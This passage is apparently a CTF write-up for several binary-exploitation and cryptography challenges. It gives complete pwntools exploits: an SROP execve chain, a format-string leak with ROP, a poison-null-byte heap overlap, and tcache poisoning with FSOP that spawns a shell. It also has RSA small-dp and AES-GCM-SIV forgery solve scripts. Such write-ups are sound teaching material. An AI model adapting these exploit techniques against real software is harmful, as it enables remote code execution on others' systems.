   rip = syscall           # after sigreturn, do syscall again
   rsp = something safe    # not really used by execve
   

Execution:

• When bomb_devils_contract returns, it jumps to pop_rax_ret.
• pop_rax_ret pops the next QWORD into rax → rax = 0xf.
• Then ret jumps to the next QWORD → syscall.
• That syscall executes rt_sigreturn, which restores registers from the frame we placed on the stack.
• Now:
  • rax = 59 (execve)
  • rdi = binsh
  • rsi = 0
  • rdx = 0
  • rip = syscall
• The CPU jumps to syscall again → executes execve("/bin/sh", 0, 0) → shell.

Building the Final Payload

We first build the desired 0x200‑byte stack image desired as if there were no XOR:

offset_to_ret = 0x58  # from buffer start to saved RIP

from pwn import SigreturnFrame

frame = SigreturnFrame()
frame.rax = 59          # execve
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall
frame.rsp = 0

desired  = b'A' * offset_to_ret
desired += p64(pop_rax_ret)  # overwritten RIP
desired += p64(0xf)          # rax = rt_sigreturn
desired += p64(syscall)      # syscall; triggers sigreturn
desired += bytes(frame)      # sigreturn frame

desired = desired.ljust(0x200, b'\x00')  # Bomb Devil copies full 0x200

Now we encode it with the repeating 8‑byte key:

key = p64(system_leak)  # 8 bytes from the info leak

encoded = bytearray()
for i in range(len(desired)):
    encoded.append(desired[i] ^ key[i % 8])
payload = bytes(encoded)

We send this payload to the Bomb Devil when prompted:

[BOMB DEVIL] Infuse your energy into the contract:

Solve

Below is the full pwntools script that implements everything:

• Leaks system via Control + War devils.
• Computes libc base.
• Builds SROP payload considering XOR.
• Gets a shell.

#!/usr/bin/env python3
from pwn import *

# ------------------------------------------------------------
# Config
# ------------------------------------------------------------

binary_path = './chal_chainsawman'
libc_path   = './libc.so.6'
ld_path     = './ld-linux-x86-64.so.2'

context.binary = ELF(binary_path, checksec=False)
context.arch   = 'amd64'
context.os     = 'linux'
context.log_level = 'info'

elf  = context.binary
libc = ELF(libc_path, checksec=False)

HOST = 'remote.infoseciitr.in'
PORT = 8005

# Offsets inside the provided libc.so.6
SYSTEM_OFF   = libc.sym['system']                  # 0x58750 for this libc
BINSH_OFF    = next(libc.search(b'/bin/sh'))       # 0x1cb42f

# Manually found gadgets in this specific libc build
POP_RAX_RET_OFF = 0xDD237  # misaligned: 58 c3 → pop rax ; ret
SYSCALL_OFF     = 0x288B5  # syscall


# ------------------------------------------------------------
# Helpers
# ------------------------------------------------------------

def start():
    """
    Start local process (with given ld & libc) or remote.
    Use:
      python3 solve_pwn1.py LOCAL
      python3 solve_pwn1.py      # remote
    """
    if args.LOCAL:
        return process(
            [ld_path, "--library-path", ".", binary_path],
            env={"LD_PRELOAD": libc_path}
        )
    else:
        return remote(HOST, PORT)


def leak_system_key(io):
    """
    Use CONTROL DEVIL (Makima) + WAR DEVIL (Yoru) to leak the
    8-byte contract_seal (which is exactly system@libc).
    """
    # -----------------------------
    # CONTROL DEVIL: low 4 bytes
    # -----------------------------
    io.recvuntil(b"[CONTROL DEVIL] Submit to her control: ")

    payload0 = b'A' * 4
    io.send(payload0)

    io.recvuntil(b"[CONTROL DEVIL] Your dominated essence: ")
    leak0 = io.recvn(4)
    try:
        io.recvline()
    except EOFError:
        pass

    key0 = xor(leak0, payload0)
    log.info(f"key0 (low 4 bytes): {key0.hex()}")

    # -----------------------------
    # WAR DEVIL: high 4 bytes
    # -----------------------------
    io.recvuntil(b"[WAR DEVIL] Offer your tribute to War: ")

    payload1 = b'B' * 4
    io.send(payload1)

    io.recvuntil(b"[WAR DEVIL] Your war essence: ")
    leak1 = io.recvn(4)
    try:
        io.recvline()
    except EOFError:
        pass

    key1 = xor(leak1, payload1)
    log.info(f"key1 (high 4 bytes): {key1.hex()}")

    key = key0 + key1              # 8 bytes, little-endian
    system_leak = u64(key)
    log.success(f"Leaked system address: {hex(system_leak)}")

    return system_leak, key


def build_srop_payload(libc_base, key):
    """
    Build the 0x200-byte payload for Bomb Devil, already XOR-encoded with key.
    libc_base comes from the system leak.
    key is the 8-byte XOR key (system address bytes).
    """
    # Resolve gadgets and useful addresses
    pop_rax_ret = libc_base + POP_RAX_RET_OFF
    syscall     = libc_base + SYSCALL_OFF
    binsh       = libc_base + BINSH_OFF

    log.info(f"libc base        : {hex(libc_base)}")
    log.info(f"pop rax; ret     : {hex(pop_rax_ret)}")
    log.info(f"syscall          : {hex(syscall)}")
    log.info(f"'/bin/sh' string : {hex(binsh)}")

    # SigreturnFrame is available directly from pwntools
    frame = SigreturnFrame()
    frame.rax = 59          # SYS_execve
    frame.rdi = binsh       # "/bin/sh"
    frame.rsi = 0
    frame.rdx = 0
    frame.rip = syscall     # 2nd syscall → execve
    frame.rsp = 0           # doesn't matter, execve doesn't return

    # Stack layout inside bomb_devils_contract:
    #   buffer at [rbp-0x50]
    #   saved RBP at [rbp]
    #   saved RIP at [rbp+8]
    # memcpy(buffer, heap, 0x200) → overflow by 0x1b0 bytes
    offset_to_ret = 0x58    # from start of buffer to saved RIP

    desired  = b'A' * offset_to_ret
    desired += p64(pop_rax_ret)  # overwritten return address
    desired += p64(0xf)          # rax = SYS_rt_sigreturn
    desired += p64(syscall)      # syscall; with rsp pointing at frame
    desired += bytes(frame)      # SigreturnFrame on stack

    # Bomb Devil copies exactly 0x200 bytes
    desired = desired.ljust(0x200, b'\x00')

    # Encode with repeating 8-byte key (system address bytes)
    assert len(key) == 8
    encoded = bytearray()
    for i in range(len(desired)):
        encoded.append(desired[i] ^ key[i % 8])

    return bytes(encoded)


# ------------------------------------------------------------
# Main exploit
# ------------------------------------------------------------

def main():
    io = start()

    # Just let leak_system_key drive the initial menu/banner.
    system_leak, key = leak_system_key(io)

    # Compute libc base from leaked system
    libc_base = system_leak - SYSTEM_OFF
    log.success(f"Computed libc base: {hex(libc_base)}")

    # After WAR DEVIL, story text → Bomb Devil
    io.recvuntil(b"[BOMB DEVIL] Infuse your energy into the contract: ")

    # Build and send 0x200-byte payload
    payload = build_srop_payload(libc_base, key)
    assert len(payload) == 0x200
    io.send(payload)

    # Drop to interactive shell
    io.interactive()


if __name__ == '__main__':
    main()

FLAG: flag{1've_n3ver_g0n3_t0_sch00l_eith3r!}

Aladdin ka Chirag

Description

what's your wish?

Analysis

• checksec: The binary has no canary

Arch:       amd64-64-little
RELRO:      Full RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        PIE enabled
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

• Reverse engineering: The program logic is quite simple, as it has a single cave() function that allows us to read into two buffers on the stack: buf and s

• Vulnerabilities: The function cave() has two vulnerabilities:

  1. Stack overflow: It allocates 8 bytes for s, but allows us to write upto 18 bytes to it. Hence, it is possible to overwrite saved rbp and 2 lowest bytes of the return address
  2. Format string bug: It calls printf(buf) with buf being a user controlled buffer

Exploitation

• The first thing to mention is that if we can execute cave() only once, it is impossible to get a working exploit as despite the two bugs, we do not have any leak at first. Therefore, it is important to use the stack overflow vulnerability to create a loop, in which we can execute the cave() function many times. The approach that I opt for is overwriting the lowest byte of the return address from D2 to B0, which allows us to jump to the beginning of main().

• From now, there are different paths that we can follow, as we have a powerful format string vulnerability (note that the payload string can be upto 24 bytes). However, I accidentally found a seemingly easier ROP approach, because I see some of my addresses "stacked" up as return addresses consecutively.

• My approach is generally as follows: First, I leak libc using the format string bug. After every cave() calls, we need to always overwrite the last byte of the return address to B0 to loop back to main. The next thing that I notice is in the beginning of main, there are 2 instructions

push    rbp
mov     rbp, rsp

• Since the saved rbp is under our control, then we can push it back on the stack at the beginning of main. Another good thing is that we do not need to worry about it being a legitimate stack address as it will always be overwritten with rsp afterwards.
• Finally, we simply put our ROP gadgets at the positions of saved rbp to achieve a chain

#!/usr/bin/env python3

from pwn import *
libc = ELF('./libc.so.6')
p = remote('remote.infoseciitr.in', 8007)

def leak_libc():
    p.sendafter(b'name >>', b'A' * 16 + b'\xb0')
    p.sendafter(b'wish >> ', b'%11$llx\0')
    libc_leak = p.recvline().strip().decode()
    return int('0x' + libc_leak, 16) - 0x2a1ca

# Leak libc
libc_base = leak_libc()
log.info(f'libc_base: {hex(libc_base)}')

# Calculating addresses
pop_rdi = libc_base + 0x10f78b
pop_rsi = libc_base + 0x110a7d
binsh = libc_base + next(libc.search(b'/bin/sh'))
system = libc_base + libc.symbols['system']

# ROP
p.sendafter(b'name >>', b'A' * 8 + p64(system) + b'\xb0')
p.sendafter(b'wish >> ', b'A' * 8)
p.sendafter(b'name >>', b'A' * 8 + p64(0) + b'\xb0')
p.sendafter(b'wish >> ', b'A' * 8)
p.sendafter(b'name >>', b'A' * 8 + p64(pop_rsi) + b'\xb0')
p.sendafter(b'wish >> ', b'A' * 8)
p.sendafter(b'name >>', b'A' * 8 + p64(binsh) + b'\xb0')
p.sendafter(b'wish >> ', b'A' * 8)
p.sendafter(b'name >>', b'A' * 8 + p64(pop_rdi) + b'\xb0')
p.sendafter(b'wish >> ', b'A' * 8)

# Padding so that when we end the loop, ROP will start at pop_rdi
p.sendafter(b'name >>', b'A' * 8 + b'A' * 8 + b'\xb0')
p.sendafter(b'wish >> ', b'A' * 8)

# Send this to end the loop
p.sendafter(b'name >> ', b'A')
p.sendafter(b'wish >> ', b'A')

p.interactive()

Santa's Workshop

Description

Explore Santa's magical gift workshop and uncover the mysteries of the North Pole. Ho Ho Ho!

We are given a Google Drive link with the binaries chall, libc.so.6 and ld-linux-x86-64.so.2

Analysis

• checksec: All the mitigations are used

Arch:       amd64-64-little
RELRO:      Full RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        PIE enabled
SHSTK:      Enabled
IBT:        Enabled

• Reverse engineering: The binary allows us to perform various actions on the heap including

  1. malloc a chunk of size in range (0x50 and 0x1000)
  2. write to a chunk
  3. read from a chunk
  4. free the chunk (and the pointer and size are nulled as well so no use-after-free)
  5. master-key: check if our input matches a random 16 bytes from /dev/urandom, can only be called after load-secret. If it matches, print the flag
  6. load-secret: generate 16 random bytes and store them on the heap and a global variable.

• The main goal of us now is to somehow leak the secret random 16 bytes on the heap/ on the global variable to achieve win()

• Vulnerabilities: There are two main vulnerabilities in this binary

  1. Free heap leak: The binary freely gives us the heap address at the beginning
  2. Off by one null byte (poison null byte). At address 1A3E, the byte after our input is set to null. As our input can reach the final byte of the corresponding heap chunk, we can null out a single byte in the next chunk (which is the least significant byte of the size field). This situation is commonly known as poison null byte.

Exploitation

• Using poison null byte technique, combining with the ability to malloc, free, read and write to chunk, we can achieve the overlapping chunks as detailed in https://github.com/shellphish/how2heap/blob/master/glibc_2.35/poison_null_byte.c

• By doing so, we can call load-secret with the chunk storing the secret be the same as a chunk of us, which allows secret leaking.

#!/usr/bin/env python3

from pwn import *


p = remote('remote.infoseciitr.in', 8000)

def malloc(id, sz):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'Slot: ', str(id).encode())
    p.sendlineafter(b'Size: ', str(sz).encode())

def free(id):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'Slot: ', str(id).encode())

def read(id, sz):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'Slot: ', str(id).encode())
    p.recvuntil(b'Contents: ')
    return p.recv(sz)

def write(id, payload):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'Slot: ', str(id).encode())
    p.sendafter(b'Message: ', payload)

# Leak heap
p.recvuntil(b'Ho...Ho...Ho..')
heap_base = int(p.recvline().strip().decode(), 16)
log.info(f"Heap_leak: {hex(heap_base)}")

# Off by one null byte -> overlapping chunks
malloc(0, 0x58)
malloc(1, 0x4f8)
malloc(2, 0x50)
write(0, p64(heap_base + 0x20) + p64(0x51) + p64(heap_base + 0x8) + p64(heap_base + 0x10) + b'A' * 0x30 + p64(0x50))
free(1)

# Load secret
p.sendlineafter(b'> ', b'6')

# Leak secret
secret = read(0, 32)[16:]
log.info(f"Secret: {secret}")

# Submit secret
p.sendlineafter(b'> ', b'5')
p.sendafter(b'Code: ', secret)

p.interactive()

The Last Duel

Description

Can you survive the duel, and bring back flag to your homeland?

Analysis

Overview

The binary contains:

• An array spells[8] of pointers to dynamically allocated buffers

• A menu for operating on indices 0..7

• A global array of constant spell names

  const char *spell_texts[8] = {
      "Fireball",
      "Rasengan",
      "AvadaKedavra",
      "Kamehameha",
      "Expelliarmus",
      "arcane_blast_of_the_void!",
      "LIGHT",
      "DARK"
  };
  

Vulnerability

When choosing Learn spell (menu 1), the program has a heap overflow bug:

int learn_spell(int idx)
{
    int r = rand() % 8;
    const char *text = spell_texts[r];      // fixed internal string

    printf("guess: ");
    char user_pattern[0x100];
    read_line(user_pattern, 0x100);         // your input

    int pos = 0;
    int res = mini_regex_match(text, user_pattern, &pos);
    if (res < 0)
        return -1;

    // BUG: res is *position* in text, not length, but used as malloc size
    void *ptr = malloc(res);
    // BUG: memcpy size is strlen(text) or similar, not bounded by res
    memcpy(ptr, user_pattern, strlen(text));

    spells[idx] = ptr;
}

Core Bug: mini_regex_match returns the match position in text, which is used as malloc size. However, the copy size is based on the full spell name length, creating a heap overflow that overwrites chunk metadata.

Other Menu Options:

• Forget spell (3): free(spells[idx])
• Remember spell (4): Prints spell content - can leak heap/libc from freed chunks
• Special spell (5): Custom malloc/memcpy for precise metadata overwrite
• Menu 6: Exit path with two malloc(0xe8) calls + stdout cleanup → FSOP target via _IO_2_1_stdout_

RNG Control

The game uses rand() % 8 to select spells. We need specific lengths:

• "arcane_blast_of_the_void!" (index 5, length 0x19)
• "Rasengan" (index 1, length 0x8)

RNG Synchronization:

libll = CDLL('./libc.so.6')
libll.srand(time.time())

Use dodge (menu 2) to burn rand() calls until we get the desired spell index, making behavior deterministic.

Heap Overflow Technique

Vulnerable Code:

res = mini_regex_match(text, pattern, &pos);  // res = match position
ptr = malloc(res);                              // small allocation
memcpy(ptr, pattern, strlen(text));             // large copy → overflow

Attack Pattern: Use regex patterns to control both allocation size and overflow content:

payload = b'.?' * 0x0c + p8(0x21) + b'?'  # Sets next chunk size to 0x21

This creates controlled overflows into adjacent chunk metadata.

Information Leaks

Heap Base Leak:

• Free a tcache chunk: fd = heap_base >> 12 (safe-linking with NULL next)
• Use remember to read freed chunk contents
• Extract and decode: heap_base = (leaked_fd << 12)

Libc Base Leak:

• Create fake unsorted bin chunk (size 0xa1)
• When freed, contains main_arena pointers
• Small allocation + remember reveals libc address
• Calculate: libc_base = leak - main_arena_offset

Exploit Strategy

1. Leak Information:

• Heap base: heap_base = (fd_leak << 12)
• Libc base: libc_base = main_arena_leak - 0x203bb0

2. Prepare 0xf0 Chunks:

• Create and free two 0xf0-sized chunks for tcache poisoning
• Menu 6 will allocate malloc(0xe8) twice → uses our corrupted tcache

3. Tcache Poisoning:

• Safe-linking: fd = (chunk_addr >> 12) ^ target
• Target: _IO_2_1_stdout_
• Overflow first 0xf0 chunk's fd to point to stdout

Tcache poisoning with safe‑linking

We use the special spell (menu 5) to overwrite the first 0xf0 chunk’s header (which includes the fd pointer stored by tcache).

Safe‑linking formula in glibc 2.32+:

fd = PROTECT_PTR(chunk_addr, target) = ((uintptr_t)chunk_addr >> 12) ^ target;

So if we want fd to point to target = &_IO_2_1_stdout_, we must store:

fd = ((chunk_addr >> 12) ^ target);

We know:

• chunk_addr ≈ heap_base + 0x400 (from heap layout we observed).
• target = _IO_2_1_stdout_.

In the exploit:

stdout_addr = libc_base + libc.symbols['_IO_2_1_stdout_']
mangled = stdout_addr ^ ((heap_base + 0x400) >> 12)

payload = b"A" * 0x18 + p64(0xf1) + p64(mangled)
special(5, 0x28, payload)

This overwrites the chunk header for the first 0xf0 tcache entry:

• prev_size (ignored)
• size = 0xf1 (0xf0 used size + inuse bit)
• fd = mangled.

Now, when the program later asks for malloc(0xe8):

1. The first returned pointer will be that corrupted chunk (we ignore its content).
2. The second malloc(0xe8) will follow its fd, which now points to _IO_2_1_stdout_.

Thus, the second allocation from menu 6 returns a pointer right into the stdout FILE structure, letting us overwrite it.

FSOP: hijacking stdout

Once malloc returns _IO_2_1_stdout_, the code expects a normal heap chunk and later copies user‑controlled data into it. We craft a fake FILE structure that, when glibc does stream operations (printing, flushing, closing) on stdout at program exit, will end up calling system("||sh").

In pwntools, building a FILE structure is straightforward:

from pwn import FileStructure

_IO_2_1_stdout_ = stdout_addr
system_addr = libc_base + libc.symbols['system']

fp = FileStructure()
fp.flags = 0xfbad2484 + (u32(b'||sh') << 32)  # magic + "||sh"
fp._IO_read_end = system_addr
fp._lock = _IO_2_1_stdout_ + 0x50
fp._wide_data = _IO_2_1_stdout_
fp.vtable = libc_base + libc.symbols['_IO_wfile_jumps'] - 0x20

payload = bytes(fp) + p64(_IO_2_1_stdout_ + 0x10 - 0x68)

Here:

• fp.flags is set to a standard stdout read/write flag pattern (0xfbad2484) plus an encoded "||sh" in the upper bits, used as the argument to system.
• fp._IO_read_end is abused to hold the address of system.
• fp.vtable points inside _IO_wfile_jumps, but shifted such that one of the early virtual calls ends up using our crafted pointers.

Finally we send it during menu 6 interaction:

sa(b">> ", b"6")         # choose option 6 (exit)
sa(b">> ", b"A" * 8)     # satisfy some read for the first malloc
sa(b">> ", payload)      # overwrite stdout with our fake FILE

During program termination, glibc performs cleanup / flush on stdout, hits the corrupted vtable, and effectively executes:

system("||sh");

Solve

Below is the final exploit script used to solve the challenge, combining all of the steps above:

• RNG synchronization and steering rand()%8 via dodge.
• Heap layout manipulation for heap leak.
• Fake unsorted bin and libc leak.
• Tcache poisoning with safe‑linking.
• FSOP on _IO_2_1_stdout_ to get system("||sh").

#!/usr/bin/env python3
from pwn import *
from ctypes import CDLL
import math, time

# ----------------------------------------------------------------------
# Setup
# ----------------------------------------------------------------------
exe = ELF('./chall', checksec=False)
libc = ELF('./libc.so.6')
context.binary = exe
context.log_level = 'info'

HOST = 'remote.infoseciitr.in'
PORT = 8006

def start():
    if args.REMOTE:
        return remote(HOST, PORT)
    else:
        # run with the provided loader + libc locally
        return process(['./ld-linux-x86-64.so.2', '--library-path', '.', exe.path])

# shorthand
def s(data):              p.send(data)
def sa(delim, data):      p.sendafter(delim, data)
def sl(data):             p.sendline(data)
def sla(delim, data):     p.sendlineafter(delim, data)
def rcu(delim):           return p.recvuntil(delim)

# ----------------------------------------------------------------------
# Menu wrappers
# ----------------------------------------------------------------------
def learn(idx, guess, spell_len):
    """
    Menu 1: Learn the spell

    The binary does: val = rand() % 8; spell = spells[val];
    We want a specific spell length to control memcpy size:

      spell_len == 0x19 -> index 5: "arcane_blast_of_the_void!" (len 25)
      spell_len == 0x8  -> index 1: "Rasengan"                (len 8)

    We keep calling "dodge" (menu 2) until rand()%8 hits the index we want.
    """
    if spell_len == 0x19:
        target = 5
    elif spell_len == 0x8:
        target = 1
    else:
        raise ValueError("unexpected spell_len")

    val = libll.rand() % 8
    while val != target:
        dodge()              # menu 2, burns one rand()
        val = libll.rand() % 8

    sa(b'>> ', b'1')
    sla(b'>> ', str(idx).encode())
    sla(b'guess: ', guess)

def dodge():
    sa(b'>> ', b'2')

def forget(idx):
    sa(b'>> ', b'3')
    sla(b'>> ', str(idx).encode())

def remember(idx):
    sa(b'>> ', b'4')
    sla(b'>> ', str(idx).encode())

def special(idx, size, spell):
    sa(b'>> ', b'5')
    sla(b'>> ', str(idx).encode())
    sla(b'>> ', str(size).encode())
    sla(b'spell: ', spell)

# ----------------------------------------------------------------------
# Main exploit
# ----------------------------------------------------------------------
p = start()

# local copy of the SAME libc used by the binary, for rand() predict
libll = CDLL('./libc.so.6')
now = int(math.floor(time.time()))
libll.srand(now)

# ----------------------------------------------------------------------
# 1) Heap leak via tcache entry
# ----------------------------------------------------------------------
payload = b'.?' * 0x0c + p8(0x21) + b'?'

for i in range(0, 3):
    learn(i, payload, 0x19)
for i in range(3, 8):
    learn(i, payload, 0x19)

forget(0)
payload2 = b'.?' * 0x0c + p8(0x31) + b'?'
learn(0, payload2, 0x19)
forget(2)
remember(1)

rcu(b"spell >> ")
p.recvn(0x20)
heap_leak = u64(p.recvn(8))
heap_base = heap_leak << 12
log.info(f'heap_base = {heap_base:#x}')

# ----------------------------------------------------------------------
# 2) Fill tcache for size 0xa0 to avoid consolidation issues
# ----------------------------------------------------------------------
forget(0)
payload = b'.?' * 0x0c + p8(0x21) + b'?'
learn(0, payload, 0x19)
learn(2, payload, 0x19)

for i in range(6, -1, -1):
    forget(i)
    payload = b'.?' * 0x0c + p8(0xa1) + b'?'
    learn(i, payload, 0x19)
    forget(i + 1)

    # restore original layout
    forget(i)
    payload = b'.?' * 0x0c + p8(0x21) + b'?'
    learn(i, payload, 0x19)

for i in range(1, 8):
    payload = b'.?' * 0x0c + p8(0x21) + b'?'
    learn(i, payload, 0x19)

# ----------------------------------------------------------------------
# 3) Libc leak via fake unsorted bin
# ----------------------------------------------------------------------
forget(1)
payload = b'.?' * 0x0c + p8(0xa1) + b'?'
learn(1, payload, 0x19)
forget(2)           # this becomes a (fake) unsorted-bin chunk

# prepare two 0xf0 tcache chunks
forget(4)
payload = b'.?' * 0x0c + p8(0xf1) + b'?'
learn(4, payload, 0x19)
forget(5)           # tcache[0xf0] entry 0

forget(3)
payload = b'.?' * 0x0c + p8(0xf1) + b'?'
learn(3, payload, 0x19)
forget(4)           # tcache[0xf0] entry 1

# leak libc from the unsorted-bin chunk at index 2
payload = b'.?' * (0x8 // 2)
learn(2, payload, 0x8)
remember(2)

rcu(b"spell >> ")
p.recvn(0x8)
libc_leak = u64(p.recvn(8))
libc_base = libc_leak - 0x203bb0      # 0x203bb0 = main_arena + 0xf0 in this libc
log.info(f'libc_base = {libc_base:#x}')

# ----------------------------------------------------------------------
# 4) Tcache poisoning for 0xf0 chunks → target _IO_2_1_stdout_
# ----------------------------------------------------------------------
stdout_addr = libc_base + libc.symbols['_IO_2_1_stdout_']
system_addr = libc_base + libc.symbols['system']

# safe-linking: PROTECT_PTR(pos, ptr) = (pos >> 12) ^ ptr
# here pos is roughly heap_base + 0x400 for the first 0xf0 tcache entry
mangled = stdout_addr ^ ((heap_base + 0x400) >> 12)
payload = b"A" * 0x18 + p64(0xf1) + p64(mangled)

# write into tcache entry using add_special_spell
special(5, 0x28, payload)

# ----------------------------------------------------------------------
# 5) FSOP on stdout via the exit path (menu 6)
# ----------------------------------------------------------------------
sa(b'>> ', b'6')
# first malloc(0xe8) – data not important
sa(b'>> ', b'A' * 8)

_IO_2_1_stdout_ = stdout_addr

# Build fake FILE structure for stdout
fp = FileStructure()
fp.flags = 0xfbad2484 + (u32(b'||sh') << 32)    # "||sh" as part of flags
fp._IO_read_end = system_addr                   # call system()
fp._lock = _IO_2_1_stdout_ + 0x50
fp._wide_data = _IO_2_1_stdout_
fp.vtable = libc_base + libc.symbols['_IO_wfile_jumps'] - 0x20

payload = bytes(fp) + p64(_IO_2_1_stdout_ + 0x10 - 0x68)
sa(b'>> ', payload)

p.interactive()

Cryptography

bolt_fast

Description

Everyone keeps telling me to worry about Wiener's attack, but they just don't understand optimization. Don't bother checking my key size; it's huge. You'll never catch me! Hahahaha!

Analysis

The challenge provides RSA key generation code with a critical vulnerability in creating the $d_p$ parameter (CRT exponent).

Vulnerable Code:

# The vulnerability is here:
dp_smart = getPrime(16)
e = inverse(dp_smart, p-1)

Weakness:

In standard RSA CRT (Chinese Remainder Theorem), $d_p$ is calculated as: $d_p \equiv d \pmod{p-1} \equiv e^{-1} \pmod{p-1}$

Normally, $d_p$ should be approximately the same size as $p$ (around 1024 bits). However, the challenge uses getPrime(16), meaning $d_p$ is only a 16-bit prime number.

Range of values for $d_p$: $2^{15} < d_p < 2^{16} \implies 32,768 < d_p < 65,536$

Due to the extremely small key space (only a few thousand prime numbers), we can perform a Brute-force attack to find $d_p$.

---

Mathematical Derivation

The goal is to find the prime factor $p$ from $N$ and $e$ when we know (or can guess) $d_p$.

1. From the definition $d_p \equiv e^{-1} \pmod{p-1}$, we have: $e \cdot d_p - 1 = k \cdot (p-1)$ This means $(e \cdot d_p - 1)$ is a multiple of $(p-1)$.

2. According to Fermat's Little Theorem, for any integer $a$ (choose $a=2$): $a^{p-1} \equiv 1 \pmod p$

3. Substituting, we get: $a^{e \cdot d_p - 1} \equiv 1 \pmod p$ $\Rightarrow p \mid (a^{e \cdot d_p - 1} - 1)$

4. Since $p$ is also a divisor of $N$, we can find $p$ by calculating the Greatest Common Divisor (GCD): $p = \text{GCD}(a^{e \cdot d_p - 1} - 1 \pmod N, N)$

---

Solve

The script below doesn't require external libraries (like pycryptodome), and can be run directly with Python 3.

import math
import sys

# --- CHALLENGE DATA ---
N = 22061149554706951873851465765917042279909309233484615798640186468876401527123242297915465375459511054772541825273007749026648641620485458471351811298443479262277231839408201654282927999029324652496830649919637863202844794784443579336735415046336390091671003022244732389217910334465895328371360158510046347031294125509649474722535171601096998732929497780870057433634214228116293166963101489644680801538837005001377764416442380530464289453201654394144682138927826247301956954884930328147978637795259346321547054237005318172528896865428457293207571804464061990459958593520373578234234490804585522859401957032395007142007
e = 9648003423571638489624579625383119603270189664714210175737275695548206153582516635644990660189908448510652756058045483763071850222529184219333877863638216254054444012130393864033392161426815671725858723096432660521038315432183692553568344247916320931122090436770154203149432285380142051084178668290839858171
c = 18817014323644102879407569381912044887671193778381872592373573382139976320220125847317309926920208859012582031032930373240219755720268543444729983316326640661427616841700761054678137741340093140586895094016730198447552611014038632666821117758006775144046000049080406858764900680265384743839472653817299383323869146152251839342236631780818396088131196202767951301023089053662813175083035336272981588533957561537975684034210166185396046071368061264321959248372783262788158418696375783427276741258526067168910326630496339287237940444426277757582174810909733937257258767407189452212391936958267819666424558678534741723930

# --- MATH HELPER FUNCTIONS ---

# 1. Extended Euclidean Algorithm (Calculate modular inverse)
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('Modular inverse does not exist')
    else:
        return x % m

# 2. Convert Long to Bytes (Crypto library replacement)
def long_to_bytes(val, endianness='big'):
    width = val.bit_length()
    width += 8 - ((width % 8) or 8)
    fmt = '%%0%dx' % (width // 4)
    s = bytes.fromhex(fmt % val)
    return s

# 3. Sieve of Eratosthenes (Generate list of prime numbers)
def sieve(limit):
    is_prime = [True] * (limit + 1)
    is_prime[0] = is_prime[1] = False
    for p in range(2, int(math.sqrt(limit)) + 1):
        if is_prime[p]:
            for i in range(p * p, limit + 1, p):
                is_prime[i] = False
    return [p for p in range(limit + 1) if is_prime[p]]

# --- ATTACK LOGIC ---

def solve():
    print("[*] STEP 1: Generating 16-bit primes...")
    # dp_smart is 16-bit, so max value is 65536
    primes = sieve(65536)
    
    # Filter primes that fit getPrime(16) -> [2^15, 2^16]
    candidates = [p for p in primes if p >= (1 << 15)]
    print(f"[*] Found {len(candidates)} candidates for dp.")

    print("[*] STEP 2: Brute-forcing dp to find p...")
    for dp in candidates:
        # Check: a^(e*dp - 1) = 1 mod p
        # Calculate GCD(a^(e*dp - 1) - 1, N) to find p
        
        exponent = e * dp - 1
        
        # Base a = 2
        val = pow(2, exponent, N)
        
        p = math.gcd(val - 1, N)
        
        if p > 1 and p < N:
            print(f"\n[+] SUCCESS! Found dp: {dp}")
            print(f"[+] Found p: {str(p)[:30]}...")
            
            # --- DECRYPTION ---
            print("[*] STEP 3: Decrypting the flag...")
            q = N // p
            phi = (p - 1) * (q - 1)
            d = modinv(e, phi)
            
            m_int = pow(c, d, N)
            flag = long_to_bytes(m_int)
            
            print("-" * 40)
            try:
                print(f"FLAG: {flag.decode()}")
            except:
                print(f"FLAG (HEX): {flag.hex()}")
            print("-" * 40)
            return

if __name__ == "__main__":
    solve()

FLAG: flag{w31n3r_d1dn7_73ll_y0u_70_b3_6r33dy}

Ambystoma Mexicanum

Description

The axolotl (Ambystoma mexicanum) is a species of paedomorphic mole salamander, meaning they mature without undergoing metamorphosis into the terrestrial adult form; the adults remain fully aquatic with obvious external gills.

Vulnerability

The server uses the AES GCMSIV encryption system.

The exploitation point leading to the unintended solution is the following code segment:

for i in range(4):
    key = binascii.unhexlify(KEYS[i % len(KEYS)])
    ct = binascii.unhexlify(CIPHERTEXTS[i % len(CIPHERTEXTS)])

• Using the modulo operation: If there's only 1 key, all 4 iterations use the same key, so we just need to use the first key to encrypt 4 plaintext blocks sequentially:

block0 = b"gib me flag p" + b"   "   # 13 chars + 3 spaces
block1 = b"l" + b" " * 15
block2 = b"i" + b" " * 15
block3 = b"s" + b" " * 15

so that after decryption, they can be combined to form the target message.

Solve

from pwn import *
import re
from cryptography.hazmat.primitives.ciphers.aead import AESGCMSIV

HOST = "remote.infoseciitr.in"   
PORT = 4004          

def main():
    r = remote(HOST, PORT)

    r.recvuntil(b"Your choice:")

    r.sendline(b"2")
    data = r.recvuntil(b"Your choice:").decode()


    key_match   = re.search(r"KEYS=\['([0-9a-f]+)'\]", data)
    nonce_match = re.search(r"nonce=([0-9a-f]+)", data)
    assert key_match and nonce_match, "Failed to parse key/nonce"

    key_hex   = key_match.group(1)
    nonce_hex = nonce_match.group(1)

    print(f"[+] Leaked key:   {key_hex}")
    print(f"[+] Leaked nonce: {nonce_hex}")

    key   = bytes.fromhex(key_hex)
    nonce = bytes.fromhex(nonce_hex)

    block0 = b"gib me flag p" + b"   "   # 13 chars + 3 spaces
    block1 = b"l" + b" " * 15
    block2 = b"i" + b" " * 15
    block3 = b"s" + b" " * 15
    P = block0 + block1 + block2 + block3
    assert len(P) == 64

    aead = AESGCMSIV(key)
    ct   = aead.encrypt(nonce, P, b"")
    ct_hex = ct.hex()
    print(f"[+] Forged ciphertext (hex): {ct_hex}")

    r.sendline(b"3")
    r.recvuntil(b"Enter ciphertext (hex):")
    r.sendline(ct_hex.encode())

    r.recvuntil(b"Your choice:")

    r.sendline(b"4")

    print(r.recvall().decode())

if __name__ == "__main__":
    main()

